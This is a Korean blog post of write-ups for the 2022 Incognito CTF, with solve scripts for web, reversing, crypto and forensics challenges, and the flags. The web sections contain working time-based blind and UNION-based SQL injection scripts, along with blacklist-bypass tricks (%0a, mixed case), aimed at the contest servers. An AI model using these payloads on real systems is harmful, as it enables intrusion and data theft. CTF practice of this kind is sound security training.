deayzl's blog

[2022 Incognito CTF] writeups 본문

CTF writeup/Incognito CTF

[2022 Incognito CTF] writeups

deayzl 2023. 3. 27. 20:10

1. crawl

 

import requests

s = requests.Session()
counter = 1

while True:
    req = requests.Request('GET', 'http://ctf.incognito.kr:9000/ctf/mailbox')
    pre = s.prepare_request(req)
    resp = s.send(pre)
    csrf = resp.text[resp.text.find("{ \"X-CSRFToken\": '")+len("{ \"X-CSRFToken\": '"):]
    csrf = csrf[:csrf.find('\'')]
    
    req = requests.Request('POST', 'http://ctf.incognito.kr:9000/ctf/mailbox/mail_detail')
    pre = s.prepare_request(req)
    pre.headers['X-CSRFToken'] = csrf
    pre.headers['X-Requested-With'] = 'XMLHttpRequest'
    pre.headers['Referer'] = 'http://ctf.incognito.kr:9000/ctf/mailbox'
    pre.headers['Pragma'] = 'no-cache'
    pre.headers['Origin'] = 'http://ctf.incognito.kr:9000'
    pre.headers['Host'] = 'ctf.incognito.kr:9000'
    pre.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
    pre.headers['Connection'] = 'keep-alive'
    pre.headers['Cache-Control'] = 'no-cache'
    pre.headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
    pre.headers['Accept-Encoding'] = 'gzip, deflate'
    pre.headers['Accept-Language'] = 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7'
    pre.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'
    pre.headers['Content-Length'] = str(len(f'"{counter}_show"'))
    pre.body = f'"{counter}_show"'
    resp = s.send(pre)
    print(resp.text)
    if 'INCO{' in resp.text and resp.text[len(resp.text)-1-2] == '}':
        print('got it!!')
        break
    counter += 1
#INCO{It_1s_F1Ag_tHank_yOu3}

 

2. login

 

web 문제 중 blacklist filter 가 있는 경우, 대문자를 끼워넣거나 %0a 를 사용하는 방식으로 우회할 수 있다.

그리고 table, column 의 이름은 information_schema, sqli 의 경우 sqlite_master 에서 알 수 있다.

import requests
import time

#table: member ADMINISTRABLE_ROLE_AUTHO)IZATIO7S INNODB_TABLESPACES

#member
#column: name pw num

counter = 0
while True:
    start_time = time.time()
    req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aLeNgth(pw)<{counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
    end_time = time.time()
    #print(end_time - start_time)
    if end_time - start_time > 2:
        counter -= 1
        break
    counter += 1
_len = counter
print(_len)

_name = ''
for i in range(_len):
    counter = 33
    while True:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aaScii(suBsTring(pw,{i+1},1))={counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
        end_time = time.time()
        #print(end_time - start_time)
        if end_time - start_time > 2:
            #counter -= 1
            _name += chr(counter)
            print('Hit!, ', _name)
            break
        counter += 1
print(_name)
#VAPB{U3110!o1vaq_4qz1a!!} -> rot13 13 ->
#INCO{H3110!b1ind_4dm1n!!}

3. admin

 

여기는 select 의 사용이 불가능하기에 column 의 이름을 추측해야 하고,

time based sql injection 으로 YWRtaW5z (admins) 계정의 학번을 알아내야 한다.

그 계정으로 "비밀번호 찾기" 를 누르면, flag 의 base64 값이 나온다.

import requests
import time
import string

num = ''
counter = 1
while True:
    bFound = False
    for i in string.digits:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:48888/index.php?name=asdf%5C&num=%0aor%0aif(name%0alike%0a\'YWRtaW5z\'%0aand%0anum%0alike%0a\''+num+i+'%25\',sleep(3),False)%0aor%0a%27')
        end_time = time.time()
        print(end_time - start_time)
        if end_time - start_time > 2:
            num += i
            print('Hit!, ', num)
            bFound = True
            break
    if not bFound:
        break
    counter += 1
print(num)
#YWRtaW5z 19383746 -> SU5DT3tCNDUzNjRfMTVfNW9fMzQ1eSEhIX0= -> INCO{B45364_15_5o_345y!!!}

4. chatting

 

여러 테이블 중 auth_user 의 first_name 을 보면 flag 를 얻을 수 있다.

CREATE TABLE "django_migrations" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "app" varchar(255) NOT NULL, "name" varchar(255) NOT NULL, "applied" datetime NOT NULL)

CREATE TABLE sqlite_sequence(name,seq)

CREATE TABLE "auth_group_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE TABLE "auth_user_groups" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE TABLE "auth_user_user_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE UNIQUE INDEX "auth_group_permissions_group_id_permission_id_0cd325b0_uniq" ON "auth_group_permissions" ("group_id", "permission_id")

CREATE INDEX "auth_group_permissions_group_id_b120cbf9" ON "auth_group_permissions" ("group_id")

CREATE INDEX "auth_group_permissions_permission_id_84c5c92e" ON "auth_group_permissions" ("permission_id")

CREATE UNIQUE INDEX "auth_user_groups_user_id_group_id_94350c0c_uniq" ON "auth_user_groups" ("user_id", "group_id")

CREATE INDEX "auth_user_groups_user_id_6a12ed8b" ON "auth_user_groups" ("user_id")

CREATE INDEX "auth_user_groups_group_id_97559544" ON "auth_user_groups" ("group_id")

CREATE TABLE "django_admin_log" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "object_id" text NULL, "object_repr" varchar(200) NOT NULL, "action_flag" smallint unsigned NOT NULL CHECK ("action_flag" >= 0), "change_message" text NOT NULL, "content_type_id" integer NULL REFERENCES "django_content_type" ("id") DEFERRABLE INITIALLY DEFERRED, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "action_time" datetime NOT NULL)

...
import requests


req = requests.get(f'http://ctf.incognito.kr:8877/?search=%27%20union%20select%20first_name,%20first_name%20from%20auth_user--%20')
flag = req.text[req.text.find('INCO{'):]
flag = flag[:flag.find('}')+1]
print(flag)
#INCO{5ql_1NjEc71on}

5. DoNotDebug

 

IsDebuggerPresent 와 같은 안티 디버깅 기법들을 제거하는 패치를 해주면 손쉽게 flag 를 얻을 수 있다.

6. Stack Machine

 

vm 파일의 instruction 을 해석하고 난 후, z3 로 풀면 끝.

from pwn import *

vm_raw = b''
with open('vm', 'rb') as f:
    while True:
        tmp = f.read(1024)
        if len(tmp) == 0:
            break
        else:
            vm_raw += tmp

vm_len = u16(vm_raw[:2])
vm = vm_raw[2:vm_len+2]

c = [0 for i in range(700)]
print('j == -1')
j = -1
i = 0
while i < vm_len:
    content = vm[i]
    i += 1
    if content == 219:
        j += 1
        print(f'c[{j}] = getchar()')
    elif content == 213:
        i += 8
        print(f'c[{j}] != 0 then i += 8+{u64(vm[i:i+8])}')
        j -= 1
    elif content == 202:
        print(f'c[{j-1}] ^= c[{j}]')
        j -= 1
    elif content == 184:
        print(f'c[{j-1}] += c[{j}]')
        j -= 1
    elif content == 161:
        print(f'exit({u64(vm[i:i+8])})')
        exit()
    elif content == 54:
        print(f'putchar(c[{j}])')
        j -= 1
    elif content == 41:
        j += 1
        print(f'c[{j}] = {u64(vm[i:i+8])}')
        i += 8
    elif content == 48:
        print(f'c[{j-1}] = (c[{j}] != c[{j-1}])')
        j -= 1
    else:
        assert False
from z3 import *

inp = []

c = [0 for i in range(100)]

s = Solver()

def getchar():
    tmp = BitVec('inp[%d]'%len(inp), 8)
    inp.append(tmp)
    return tmp

c[0] = 9932684790403988281
c[1] = 3981783414261391299
c[2] = 18128899290963801448
c[3] = 7499717806347970135
c[4] = 5425025371572045960
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] += c[2]
c[0] ^= c[1]
c[1] = 6326606491199503735
c[2] = 11727609654421141602
c[3] = 13333360695465845293
c[4] = 15936386119677961440
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] ^= c[2]
c[2] = 13013207156595470061
c[3] = 1444156656146803533
c[4] = 6835624496029438678
c[5] = getchar()
c[4] ^= c[5]
c[3] += c[4]
c[2] ^= c[3]
c[3] = 9473197671008895425
c[4] = 16390026795440292412
c[5] = 8618855848416941065
c[6] = getchar()
c[5] += c[6]
c[4] ^= c[5]
c[3] += c[4]
c[4] = 6024961974338290886
c[5] = 8810359034158194075
c[6] = 14469683107865870911
c[7] = 16039933917641716108
c[8] = 12640120913447022199
c[9] = getchar()
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] ^= c[6]
c[4] += c[5]
c[5] = 5193290494856744947
c[6] = 10690958200367824705
c[7] = 4868948814662615861
c[8] = 683964415960939350
c[9] = 4163681683479634048
c[10] = 12168753866435275347
c[11] = 12146127191315940638
c[12] = getchar()
c[11] ^= c[12]
c[10] += c[11]
c[9] ^= c[10]
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] += c[6]
c[6] = 3476564392780481757
c[7] = 2006874671871151415
c[8] = 12824197427929327444
c[9] = 12083025626049681937
c[10] = 16008583071417006553
c[11] = 3503452712029565141
c[12] = 4687048395109227849
c[13] = 16854047988139109216
c[14] = 13756878276426990950
c[15] = getchar()
c[14] ^= c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] ^= c[12]
c[10] += c[11]
c[9] += c[10]
c[8] ^= c[9]
c[7] ^= c[8]
c[6] += c[7]
c[7] = 7028037281966016268
c[8] = 14165122113651211877
c[9] = 5392392772250547940
c[10] = 3311842680646068432
c[11] = getchar()
c[10] ^= c[11]
c[9] += c[10]
c[8] += c[9]
c[7] += c[8]
c[8] = 9258641333616248163
c[9] = 13646422201855178699
c[10] = 17244770065079177130
c[11] = getchar()
c[10] += c[11]
c[9] += c[10]
c[8] += c[9]
c[9] = 11263758573414315722
c[10] = 2291098985055159465
c[11] = 17736300515739104956
c[12] = 9225658490194612832
c[13] = getchar()
c[12] += c[13]
c[11] += c[12]
c[10] += c[11]
c[9] ^= c[10]
c[10] = 10725323274089116828
c[11] = 6647285194965883625
c[12] = 10033362048030486878
c[13] = 8536304132617548188
c[14] = 6486727104292397225
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] += c[13]
c[11] += c[12]
c[10] ^= c[11]
c[11] = 10031450704042083898
c[12] = 15064108163919261094
c[13] = 6566164850047027542
c[14] = 3579091316087062654
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] += c[12]
c[12] = 698354924443006014
c[13] = 15280877972506416330
c[14] = 15577458196294027228
c[15] = getchar()
c[14] += c[15]
c[13] += c[14]
c[12] += c[13]
c[13] = 2498670747640652309
c[14] = 9524402598716321551
c[15] = 18044044835724495664
c[16] = 6213568967391424121
c[17] = 3147938522393136546
c[18] = 1730165799852629577
c[19] = 6408097110053457446
c[20] = 6196815601815273338
c[21] = 270944429482767874
c[22] = getchar()
c[21] += c[22]
c[20] += c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[13] += c[14]
c[14] = 4918898107041287428
c[15] = 18175739274470711949
c[16] = 14421442322560697809
c[17] = getchar()
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[15] = 8018804925798494415
c[16] = 6710318530716452507
c[17] = 16126219073666357108
c[18] = 14081309027816664652
c[19] = 16733055164831549011
c[20] = 7157954037798845337
c[21] = getchar()
c[20] += c[21]
c[19] ^= c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[16] = 15503965566483097647
c[17] = 4996101922589672156
c[18] = 5833521358458912777
c[19] = 2723680459370559844
c[20] = 2328313581554868504
c[21] = 1357365813224912539
c[22] = 14696593702283082662
c[23] = getchar()
c[22] += c[23]
c[21] ^= c[22]
c[20] ^= c[21]
c[19] += c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[17] = 13718262097243472683
c[18] = 3323983633866858589
c[19] = 10119337698916987669
c[20] = 1136020430667426008
c[21] = getchar()
c[20] ^= c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] ^= c[18]
c[18] = 4498241019005291386
c[19] = 10430024839406056567
c[20] = 11081984034916842939
c[21] = 2377861015981010747
c[22] = 8140368618305448802
c[23] = 11818413254717561094
c[24] = 7064401558039292889
c[25] = 12505631402569488455
c[26] = getchar()
c[25] += c[26]
c[24] += c[25]
c[23] += c[24]
c[22] += c[23]
c[21] += c[22]
c[20] += c[21]
c[19] += c[20]
c[18] ^= c[19]
c[19] = 12426720606117189214
c[20] = 14972901593259487129
c[21] = 8543482851339982473
c[22] = getchar()
c[21] += c[22]
c[20] ^= c[21]
c[19] += c[20]
c[20] = 1629889153707539478
c[21] = 17341177077300957439
c[22] = 6078944653200992161
c[23] = 10566666523869213247
c[24] = 7263284840378083349
c[25] = 17584022320925044751
c[26] = 8692105150239555357
c[27] = 315833979318776616
c[28] = 6269493266600410358
c[29] = getchar()
c[28] ^= c[29]
c[27] ^= c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] += c[23]
c[21] ^= c[22]
c[20] += c[21]
c[21] = 1928151548783765996
c[22] = 9136913200161131206
c[23] = 9558448254955062399
c[24] = 9043200431716271294
c[25] = 7522359116772730195
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] ^= c[23]
c[21] += c[22]
c[22] = 9912258405660383033
c[23] = 6050409919930564764
c[24] = 772317344628148685
c[25] = 11746303378648469064
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[22] ^= c[23]
c[23] = 18139491710616570868
c[24] = 9346305025277215902
c[25] = 835069692985696380
c[26] = 1773732121093517278
c[27] = 105682633695814624
c[28] = 8210763851348992640
c[29] = 1113714189784085863
c[30] = 5476748382071574810
c[31] = getchar()
c[30] ^= c[31]
c[29] ^= c[30]
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[24] = 4433023941960474278
c[25] = 14112970271161702627
c[26] = 14453461473651973526
c[27] = 11710389551995994491
c[28] = getchar()
c[27] ^= c[28]
c[26] ^= c[27]
c[25] += c[26]
c[24] += c[25]
c[25] = 10631904080342836610
c[26] = 13189193739346557134
c[27] = 8869784457484967284
c[28] = 12194173170689449781
c[29] = getchar()
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] += c[26]
c[26] = 15915053349214019189
c[27] = 11521767751078383438
c[28] = 14533552431219244418
c[29] = 14300881089460759252
c[30] = 9040285580144197694
c[31] = 10257692247147470437
c[32] = 14192837257263753759
c[33] = 2735605769679131093
c[34] = getchar()
c[33] += c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[27] ^= c[28]
c[26] ^= c[27]
c[27] = 13646125251590784611
c[28] = 2350223036634077455
c[29] = 5333532857677095192
c[30] = getchar()
c[29] ^= c[30]
c[28] += c[29]
c[27] ^= c[28]
c[28] = 10718192012270129589
c[29] = 123785428779133261
c[30] = 1115427221566365663
c[31] = 13858125889399502454
c[32] = 15421756623045370081
c[33] = 10625431853482940446
c[34] = 2858922243027052087
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[29] = 4193907992175213577
c[30] = 170664819355138875
c[31] = 9846060713415560061
c[32] = 10008376725607836570
c[33] = 6500742485917708152
c[34] = 3703571390196563300
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[30] ^= c[31]
c[29] ^= c[30]
c[30] = 16068289189730100280
c[31] = 15983412130463586929
c[32] = 6101489928213793106
c[33] = 15632864178300331681
c[34] = 13550763660520404178
c[35] = 1631272113114106589
c[36] = 3288050860235592420
c[37] = 1790832365339697305
c[38] = 4237654194595834826
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] += c[34]
c[32] += c[33]
c[31] += c[32]
c[30] += c[31]
c[31] = 1399164207473144990
c[32] = 15677047834318502945
c[33] = 7507893918949420867
c[34] = 14174128410387719963
c[35] = 11736459515879490328
c[36] = 11055886264332921041
c[37] = 9004881701944248172
c[38] = 17459828991442561468
c[39] = 12657901952147185249
c[40] = getchar()
c[39] ^= c[40]
c[38] += c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[32] = 11542163322951764181
c[33] = 13556695670265251290
c[34] = 8896178454740675680
c[35] = 9714994894358830132
c[36] = 4415780584005132632
c[37] = 12574376580664805321
c[38] = 2705749237807390307
c[39] = getchar()
c[38] ^= c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] += c[33]
c[33] = 2062725140253809310
c[34] = 1545706997601201613
c[35] = 16466472025074215596
c[36] = 13910973756042749477
c[37] = getchar()
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] += c[34]
c[34] = 15313922134322430163
c[35] = 5554890310739120801
c[36] = 10023476581573828743
c[37] = 9119145857545001130
c[38] = 4054077477321909583
c[39] = 12407098630961990094
c[40] = getchar()
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] ^= c[35]
c[35] = 1350795824549080488
c[36] = 6009822791611617285
c[37] = 8119372895504244127
c[38] = 2251446627786121745
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] ^= c[37]
c[35] ^= c[36]
c[36] = 15362678556740064341
c[37] = 10316159694986214414
c[38] = 3591983768360169475
c[39] = 14938784382612384621
c[40] = 11339084893309025514
c[41] = 12205994744993947123
c[42] = 17433327879405071452
c[43] = 5816977475588028627
c[44] = 16136773507488350822
c[45] = getchar()
c[44] += c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[37] = 14016925425405076414
c[38] = 6267620817628946003
c[39] = 16430625412469031478
c[40] = 88182008894387362
c[41] = 8709429871187949033
c[42] = 10589748356343871522
c[43] = 5064334248483087925
c[44] = 7426804913387014566
c[45] = 10865171643927062589
c[46] = getchar()
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] ^= c[38]
c[38] = 16763221103862173059
c[39] = 13422886181026844195
c[40] = 1631568059986288660
c[41] = 5215276383434159904
c[42] = 599997451257354427
c[43] = 16090446934827825033
c[44] = 5698261134564167716
c[45] = 14703224673005718394
c[46] = 16483544490155560671
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] ^= c[39]
c[39] = 5514693649090898598
c[40] = 5675775170157984441
c[41] = 14125598251763666359
c[42] = 18170077620203995512
c[43] = 19592580633248516
c[44] = 13683458113123837196
c[45] = getchar()
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] ^= c[40]
c[40] = 3131572931438933272
c[41] = 10714943557282477766
c[42] = 5484270251250118157
c[43] = 7822281286051639469
c[44] = 217496263967125951
c[45] = 7383182598747815858
c[46] = getchar()
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] ^= c[43]
c[41] += c[42]
c[40] += c[41]
c[41] = 11073291388929666744
c[42] = 12556045251181411187
c[43] = 17202987169272959651
c[44] = 3498233194846432736
c[45] = 9811028171250343540
c[46] = 15447895449397085620
c[47] = getchar()
c[46] ^= c[47]
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] += c[42]
c[42] = 18311754622359156630
c[43] = 15594695003269406222
c[44] = 14863770709621722151
c[45] = 1995415076881473459
c[46] = 11624903732590886947
c[47] = getchar()
c[46] += c[47]
c[45] += c[46]
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[43] = 11997434615315793955
c[44] = 15206057853866387321
c[45] = 11758249108697471326
c[46] = 5159877175902714817
c[47] = 11990864672144733375
c[48] = 16654263466120501907
c[49] = getchar()
c[48] += c[49]
c[47] += c[48]
c[46] ^= c[47]
c[45] ^= c[46]
c[44] += c[45]
c[43] ^= c[44]
c[44] = 14901411196071314281
c[45] = 16947858051347698953
c[46] = 11966293193572801808
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] += c[45]
c[45] = 17205182659947320959
c[46] = 7134039153444132965
c[47] = 1106747787369745867
c[48] = 8187918296814335425
c[49] = 15956329184180189402
c[50] = 4384353541114149762
c[51] = 2675631644319678684
c[52] = 2847463810049019273
c[53] = 12182251566179445109
c[54] = getchar()
c[53] += c[54]
c[52] += c[53]
c[51] ^= c[52]
c[50] ^= c[51]
c[49] += c[50]
c[48] += c[49]
c[47] ^= c[48]
c[46] ^= c[47]
c[45] ^= c[46]

j = 0
res = [11160101089126054161, 2012728469017988072, 11117105121394465975, 12198350148471122344, 7607965874239596224, 6793088470981622980, 
       9191418319461399064, 15232517486787036234, 5261740622873570926, 2111042004194075722, 14858885011757777482, 17272697075264961523, 
       6313158162450257254, 1588658321132036046, 8991448573755356202, 4497652325675240907, 6016728178720961850, 13453796986756982161,
       15547245991394917615, 5920391660159577516, 7991567300444707631, 7743736540782924899, 4781932715221502857, 9817029683742592938,
       4201915802787942712, 12177332710199634000, 7336213525980958596, 5652188919652622626, 1130153536024248183, 4759154887302418413,
       16866370082191875729, 622591556653593921, 12982067723104642403, 13109947019533898011, 5112040232137058942, 9739034644397517078,
       695619218990020835, 3256345453131500815, 11450650774804292870, 3932877630134846168, 9357541319859029781, 9237722673203544338,
       1756632871624628261, 14303295942802133775, 10460946694704824854, 11086382675458244744]

for i in range(45, -1, -1):
    s.add(c[i] == res[45-i])
    
print(s.check())
md = s.model()
print(md)
for i in inp:
    print(chr(md[i].as_long()),end='')
#INCO{94a7d6671aab2c62db0760e639c5217781030e2f}

7. NAND

 

import gdb

idx = 0
bf_idx = 0

charset_range = [int(i, 16) for i in '''0x555555401e20: 0x37    0x6e    0x6b    0x75    0x34    0x67    0x30    0x73
0x555555401e28: 0x62    0x39    0x31    0x6c    0x6f    0x38    0x5f    0x63
0x555555401e30: 0x76    0x69    0x6d    0x79    0x33    0x78    0x65    0x70
0x555555401e38: 0x72    0x68    0x66    0x36    0x7a    0x74    0x35    0x61
0x555555401e40: 0x64    0x32    0x77    0x71 0x6a'''.split() if '0x5555' not in i]

flag = [charset_range[0] for i in range(40)]
flag.append(0)

gdb.execute('file NAND')
gdb.execute('aslr off')

hell_list = [0xE31, 0xE8B, 0xEF4, 0xF61, 0xFD3, 0x101E, 0x1087, 0x10F4, 0x1157, 0x11C0, 0x121A, 0x1296, 0x1308, 0x1371, 0x13BC, 0x141A, 0x147D, 0x14C8, 0x1531, 0x158F, 0x15F2, 0x164C, 0x16B5, 0x1722, 0x1785, 0x17DF, 0x1857, 0x18B5, 0x1927, 0x1990, 0x19DB, 0x1A2A, 0x1A8D, 0x1AD8, 0x1B41, 0x1B90, 0x1BE4, 0x1C20, 0x1C6B, 0x1CD8]

for i in range(len(hell_list)):
    hell_list[i] += 0x555555400000
    gdb.execute(f'b *{hex(hell_list[i])}')

goal = 0x1CF7+0x555555400000

gdb.execute('b *0xD51+0x555555400000')
gdb.execute('b *0xDBE+0x555555400000')
gdb.execute(f'b *{hex(goal)}')
gdb.execute('b *0xCA5+0x555555400000')

while True:
    gdb.execute('r <<< \'A\'')
    gdb.execute('ni')

    for i in range(len(flag)):
        gdb.execute(f'set *((char*)$rbp-0x60+{i})={hex(flag[i])}')

    gdb.execute('c')
    
    present_bp = int(gdb.execute('x/xg $rip', to_string=True).split(':\t')[0], 16)
    print(hex(present_bp), hex(hell_list[idx]))
    if present_bp == hell_list[idx]:
        bf_idx += 1
        flag[idx] = charset_range[bf_idx]
        print(idx, flag[idx])
    elif present_bp in hell_list[idx+1:]:
        print('hit!, ', bytes(flag))
        idx += 1
        bf_idx = 0
    elif present_bp == goal:
        gdb.execute('c')
        break
    else:
        assert False
#INCO{y34h_3v3ry_op3ra7ion_w1th_on1y_nand_0v0_}

8. I’M FINE THANK YOU, AND U?

 

Lxwpajcdujcrxwb! Mabl ehhdl ebdx t jnbmx lbfiex vbiaxk. Vjhkn hxd'en wxcrlnm fqjc cqrb rb jc j pujwln. Ahpxoxk, mabl bl ghm matm yetz rhn'kx ehhdbgz yhk. Rc'b sdbc j urccun qrwc. Matm'l tee. Bx, wxf hxd twxf fqjc cx mx? GNIEEWYs0cpat3anahh1n1lsh0dlp3ahh1n3i1vp3d

rot ->

Sedwhqjkbqjyedi! This looks like a quite simple cipher. Cqoru oek'lu dejysut mxqj jxyi yi qj q wbqdsu. However, this is not that flag you're looking for. Yj'i zkij q byjjbu xydj. That's all. Ie, dem oek adem mxqj je te? NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k


NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k

Affine Cipher ->

INCOOMGy0uhav3anaff1n1tyf0rth3aff1n3c1ph3r

guess ->

INCO{OMG_y0u_hav3_an_aff1n1ty_f0r_th3_aff1n3_c1ph3r}

9. Bondee

 

extract PDF from image

inside PDF:
  X Pos   Y Pos Text
  85,03  733,36 직접 관리하고 추후에 사용자들로 하여금 잔액을 되찾아가게 하였다. 이로 인해 IOTA 재단의 
  85,03  717,42 신뢰성마저도 추락한 사건이었다.
  85,03  685,41 IOTA 팀에 따르면 Curl hahser라는 하드웨어 장치가 있어야만 IOTA 거래를 생성하기 위해 
  85,03  669,47 필요한 작업증명을 수행할 수 있다고 한다.
  85,03  621,52 방향성 비사이클 그래프(DAG) 아키텍처 자체는
  85,03  605,46 흥미롭고 새로운 방식으로 분산 장부를 만드는 메커니즘이다. 
  85,03  589,51 DAG가 
  ...
  85,03  285,89 number_list 
 148,72  285,89 = [73, 78, 
 203,77  285,89 67, 
 223,92  285,89 79, 123, 
 269,85  285,89 105, 
 295,52  285,89 110, 99, 
 341,46  285,89 111, 
 367,12  285,89 95, 115, 
 413,06  285,89 119, 
 438,72  285,89 108, 117, 
 490,17  285,89 103, 
  85,03  269,82 95, 50, 48, 50, 51, 125]
  85,03  253,88 text_list = []
  85,03  221,88 for i in range(len(number_list)):
  85,03  189,99     text_list.append(chr(number_list[i]))
  85,03  142,04 str = ''.join(text_list)
  85,03  110,04 print("Flag= " + str)
number_list \
= [73, 78, \
67, \
79, 123, \
105, \
110, 99, \
111, \
95, 115, \
119, \
108, 117, \
103, \
95, 50, 48, 50, 51, 125]
text_list = []
for i in range(len(number_list)):
    text_list.append(chr(number_list[i]))
str = ''.join(text_list)
print("Flag= " + str)#Flag= INCO{inco_swlug_2023}

10. WOW

 

Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_10240_17770, Win10x64
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/kali/Downloads/ctf/incognito/wow/WOW.vmem)
                      PAE type : No PAE
                           DTB : 0x1ab000L
                          KDBG : 0xf803f538cb20L
          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff803f53e6000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2023-03-03 08:57:20 UTC+0000
     Image local date and time : 2023-03-03 17:57:20 +0900

python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe001dc265840 System                    4      0    185        0 ------      0 2023-03-03 08:49:55 UTC+0000                                 
0xffffe001dd977040 smss.exe                476      4      2        0 ------      0 2023-03-03 08:49:55 UTC+0000                                 
0xffffe001ddb56080 csrss.exe               568    560      8        0      0      0 2023-03-03 08:49:59 UTC+0000                                 
0xffffe001ddd6f080 wininit.exe             628    560      1        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001ddd74080 csrss.exe               636    620     11        0      1      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001ddd9b080 winlogon.exe            672    620      2        0      1      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001dddef480 services.exe            732    628      6        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
0xffffe001dddfa080 lsass.exe               740    628     10        0      0      0 2023-03-03 08:50:00 UTC+0000                                 
